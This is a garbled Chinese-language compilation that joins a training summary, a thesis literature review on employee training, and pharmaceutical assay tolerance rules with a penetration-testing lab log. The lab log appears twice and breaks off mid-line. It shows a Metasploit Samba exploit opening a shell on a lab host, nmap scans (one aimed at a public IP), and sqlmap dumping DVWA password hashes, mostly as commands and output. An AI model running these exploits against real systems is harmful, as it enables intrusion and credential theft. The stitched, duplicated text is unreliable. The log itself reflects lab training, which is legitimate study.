培训总结报告2015-03-20

培训完成情况的报告范文简介本报告旨在总结我所参加的培训项目的完成情况，并对培训过程进行评估和反馈。

培训项目的目标是提升我在相关领域的专业能力，从而更好地应对工作中的挑战。

培训项目概述培训项目的主题是《市场营销策略与实施技巧》，为期两个月，通过在线学习和线下研讨相结合的方式进行。

项目内容包括市场调研、市场定位、产品定价、渠道管理、品牌建设等多个方面的知识和技能。

培训内容回顾在培训过程中，我通过在线学习平台学习了相关课程，并完成了每周的作业和测验。

同时，每月还有线下研讨会，由专业讲师就特定主题进行授课和实践演练。

培训内容结合了理论学习和实际案例分析，使我能够在实践中学习和应用知识。

培训内容的设计与安排合理，知识点的讲解详细而深入，通过实例的引用和互动学习的方式，使我更好地理解和掌握了市场营销策略和实施技巧。

培训收获和成果通过这个培训项目，我获得了以下收获和成果：1. 知识储备提升：我系统地学习了市场调研、市场定位、产品定价、渠道管理、品牌建设等多个方面的知识，掌握了相关理论和实践技巧。

2. 解决问题的能力提升：在培训中，我通过参与讨论和案例分析，培养了解决问题的能力。

学习了如何分析市场需求，设计市场营销策略，制定实施方案等。

3. 感知全局的意识：培训内容不仅限于市场营销细节，还包括了对市场背景、竞争环境、消费者行为等的全面分析。

这使得我能够更好地把握市场动态，更好地应对市场挑战。

4. 团队协作的能力提升：在线下研讨活动中，我有机会与来自不同领域和行业的学员进行交流和合作。

这锻炼了我的团队协作和沟通能力。

对培训项目的评价和建议总的来说，本次培训项目的设计和实施都很出色。

但还有一些改进的空间：1. 更多实践机会：尽管培训中有一些实践演练环节，但我认为可以增加更多的实践机会，以帮助学员更好地将知识应用到实际工作中。

2. 深度案例分析：在课程中，可以增加更多真实案例的分析和讨论，深入探讨其中的挑战和解决方案，以增强学员的实际操作能力。

新疆天润乳业员工培训问题研究开题报告文献综述1．结合毕业设计（论文）课题情况，根据所查阅的文献资料，每人撰写2000字左右的文献综述：国外研究现状有关“培训”研究始于20 世纪初，其概念最早由美国古典管理学泰斗雷德里克·泰勒提出，培训领域的研究一直在增加，理论研究与实际应用之间的相互作用也越来越频繁。

经过许多学者们多年的研究和探索，西方学者在培训理论和应用研究中积累了非常丰富的成果，建立了较为成熟的培训理论体系(张静宁,李婉雅,2022)。

这些研究成果在生产实践领域也得到了广泛的使用和验证，在生产实践领域的应用和验证又促进了与培训有关的理论研究的进一步改进和优化。

国外有关员工培训理论的发展，遵循于生产技术、管理理论发展进程，同时伴随社会生产技术不断提升、管理理论不断丰富其内容亦越来越丰富。

总结员工培训的发展，主要可分为以下不同阶段(王瑞珍,赵梦洁,陈雨,2021)：20 世纪初的早期传统培训理论期、20 世纪50-60 年代科学培训理论期、20 世纪60-90 年代系统培训理论期、20世纪90 年代至今的样化培训时期。

Danna 等(2008) 强调绩效管理对于企业培训发挥的重要作用，认为培训部门应充分考虑绩效部门发展的需求，以免出现培训和绩效间分离的问题。

Antonio (2010)认为，由于(PSM)的职能是战略性的，具有良好采购技能的PSM员工将显著提高业务绩效(刘晓彤,黄欣怡,周嘉)。

经研究结果表明，企业对PSM 员工的培训不足。

大多数公司没有制定正式的培训计划和进行科学的培训效果评估。

建议企业根据PSM 所需的专业技能，为PSM 员工设计系统的培训方案。

Levine（2012) 明确提出培训需求并不是一成不变的，其会伴随着岗位调整、工作职责的更改等方面而衍化更新的培训需求，因此，只有在充分了解员工的培训需求的基础上开展培训，才可以推动企业高质量发展(吴秋菲,孙雅琪,2018)。

分析误差限度范围分析误差限度范围，出处：中国药品标准检验操作规范。

● 容量分析法最大允许相对偏差不得超过0.3%；● 重量法最大允许相对偏差不得超过0.5%；● 氮测定法最大允许相对偏差不得超过1%；● 氧瓶燃烧法最大允许相对偏差不得超过0.5%；● 仪器分析法最大允许相对偏差不得超过2%；● 标定和复标各3份平行试验结果的相对平均偏差，不得超过0.1％，标定和复标平均值的相对偏差不得超过0.1%；● 恒重前后两次称重不超过0.3mg；● 干燥失重最大允许相对偏差不超过2%；药审中心：含量测定分析方法验证的可接受标准简介审评四部黄晓龙摘要：本文介绍了在对含量测定所用的分析方法进行方法学验证时，各项指标的可接受标准，以利于判断该分析方法的可行性。

关键词：含量测定分析方法验证可接收标准在进行质量研究的过程中，一项重要的工作就是要对质量标准中所涉及到的分析方法进行方法学验证，以保证所用的分析方法确实能够用于在研药品的质量控制。

为规范对各种分析方法的验证要求，我国已于2005年颁布了分析方法验证的指导原则。

该指导原则对需要验证的分析方法及验证的具体指标做了比较详细的阐述。

但是文中未涉及各具体指标在验证时的可接受标准，国际上已颁布的指导原则中也未发现相关的要求。

另一方面，大多数药品研发单位在进行质量研究时，已逐步认识到分析方法验证的必要性与重要性，大都也在按照指导原则的要求进行分析方法验证，但验证完后却因没有一个明确的可接受标准，而难以判断该分析方法是否符合要求。

本文结合国外一些大型药品研发企业在此方面的要求，提出了在对含量测定方法进行验证时的可接受标准，供国内的药品研发单位在进行研究时参考。

1．准确度该指标主要是通过回收率来反映。

验证时一般要求分别配制浓度为80％、100％和120％的供试品溶液各三份，分别测定其含量，将实测值与理论值比较，计算回收率。

可接受的标准为：各浓度下的平均回收率均应在98.0%-102.0%之间，9个回收率数据的相对标准差（RSD）应不大于2.0%。

渗透测试培训3月13日第一天：主要实验总结首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。

实验环境：KALI linux 作为攻击工具；owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/242、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf〉> passwd[*] exec: passwd输入新的UNIX 密码：重新输入新的UNIX 密码：passwd：已成功更新密码然后寻找samba模块msf > search sambaMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversalauxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflowauxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflowauxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflowexploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflowexploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflowexploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflowexploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Executionexploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Executionexploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Executionexploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflowexploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflowpost/linux/gather/enum_configs normal Linux Gather Configurationsmsf > use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads===================Name Disclosure Date Rank Description---- --------------- ---- -----------cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh)cmd/unix/generic normal Unix Command, Generic Command Executioncmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shellpayload => cmd/unix/bind_netcatmsf exploit(usermap_script) > show options 查看需要设置的参数msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机RHOST => 10.10.10.254msf exploit(usermap_script) > exploit启动攻击[*] Started bind handler[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800已经取得10.10.10.254机子的控制权，可以增加用户useradd test 用户增加成功&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测-PU -sn UDP ping不列服务，-Pn不适用pingnmap -sS -Pn xx.xx.xx.xx tcp syn 扫描不发送icmpnamp -sV -Pn xx.xx.xx.xx 列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&nmap 网站扫描msf > nmapmsf > nmap -sV -Pn 10.10.10.254[*] exec: nmap -sV -Pn 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CSTNmap scan report for 10.10.10.254Host is up (0.00020s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at /submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 secondsmsf > nmap -PO -script=smb-check-vulns 10.10.10.254[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTNmap scan report for 10.10.10.254Host is up (0.00021s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%msf > nmap -O [*] exec: nmap -O Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (211.100.35.132)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 57.88 secondsmsf > use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) > set THREADS 50THREADS => 50msf auxiliary(dir_scanner) > set RHOSTS RHOSTS => msf auxiliary(dir_scanner) > run[*] Detecting error code[*] Detecting error code[*] Scanned 2 of 2 hosts (100% complete)[*] Auxiliary module execution completedsqlmap 检查sql注入的漏洞root@kali:~# sqlmaproot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:50:20[11:50:20] [INFO] testing connection to the target URL[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds[11:50:21] [INFO] target URL is stable[11:50:21] [INFO] testing if GET parameter 'id' is dynamic[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic[11:50:21] [INFO] GET parameter 'id' is dynamic[11:50:21] [INFO] heuristics detected web page charset 'ascii'[11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[11:50:21] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:50:25] [WARNING] reflective value(s) found and filtering out[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL inline queries'[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:50:36] [INFO] target URL appears to have 2 columns in query[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=SubmitType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=SubmitType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=SubmitType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit---[11:50:40] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5.0[11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'[*] shutting down at 11:50:40root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs可以看出返回数据库为：[11:53:32] [WARNING] reflective value(s) found and filtering outavailable databases [2]:[*] dvwa[*] information_schemaroot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables查看dvwa数据库Database: dvwa[2 tables]+-----------+| guestbook || users |+-----------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columnsDatabase: dvwaTable: users[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| user | varchar(15) || avatar | varchar(70) || first_name | varchar(15) || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+------------+-------------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dumpDatabase: dvwaTable: users[5 entries]+---------+--------------------------------------------+| user | password |+---------+--------------------------------------------+| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) || admin | 21232f297a57a5a743894a0e4a801fc3 (admin) || gordonb | e99a18c428cb38d5f260853678922e03 (abc123) || pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 || smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+---------+--------------------------------------------+可以看出用户名为admin 密码是admin成功2day&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&情报收集whois 域名注册信息查询。

渗透测试培训3月13日第一天：主要实验总结首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。

实验环境：KALI linux 作为攻击工具；owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/242、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf〉> passwd[*] exec: passwd输入新的UNIX 密码：重新输入新的UNIX 密码：passwd：已成功更新密码然后寻找samba模块msf > search sambaMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversalauxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflowauxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflowauxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflowexploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflowexploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflowexploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflowexploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Executionexploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Executionexploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Executionexploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflowexploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflowpost/linux/gather/enum_configs normal Linux Gather Configurationsmsf > use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads===================Name Disclosure Date Rank Description---- --------------- ---- -----------cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh)cmd/unix/generic normal Unix Command, Generic Command Executioncmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shellpayload => cmd/unix/bind_netcatmsf exploit(usermap_script) > show options 查看需要设置的参数msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机RHOST => 10.10.10.254msf exploit(usermap_script) > exploit启动攻击[*] Started bind handler[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800已经取得10.10.10.254机子的控制权，可以增加用户useradd test 用户增加成功&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测-PU -sn UDP ping不列服务，-Pn不适用pingnmap -sS -Pn xx.xx.xx.xx tcp syn 扫描不发送icmpnamp -sV -Pn xx.xx.xx.xx 列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&nmap 网站扫描msf > nmapmsf > nmap -sV -Pn 10.10.10.254[*] exec: nmap -sV -Pn 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CSTNmap scan report for 10.10.10.254Host is up (0.00020s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at /submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 secondsmsf > nmap -PO -script=smb-check-vulns 10.10.10.254[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTNmap scan report for 10.10.10.254Host is up (0.00021s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%msf > nmap -O [*] exec: nmap -O Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (211.100.35.132)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 57.88 secondsmsf > use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) > set THREADS 50THREADS => 50msf auxiliary(dir_scanner) > set RHOSTS RHOSTS => msf auxiliary(dir_scanner) > run[*] Detecting error code[*] Detecting error code[*] Scanned 2 of 2 hosts (100% complete)[*] Auxiliary module execution completedsqlmap 检查sql注入的漏洞root@kali:~# sqlmaproot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:50:20[11:50:20] [INFO] testing connection to the target URL[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds[11:50:21] [INFO] target URL is stable[11:50:21] [INFO] testing if GET parameter 'id' is dynamic[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic[11:50:21] [INFO] GET parameter 'id' is dynamic[11:50:21] [INFO] heuristics detected web page charset 'ascii'[11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[11:50:21] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:50:25] [WARNING] reflective value(s) found and filtering out[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL inline queries'[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:50:36] [INFO] ORDER 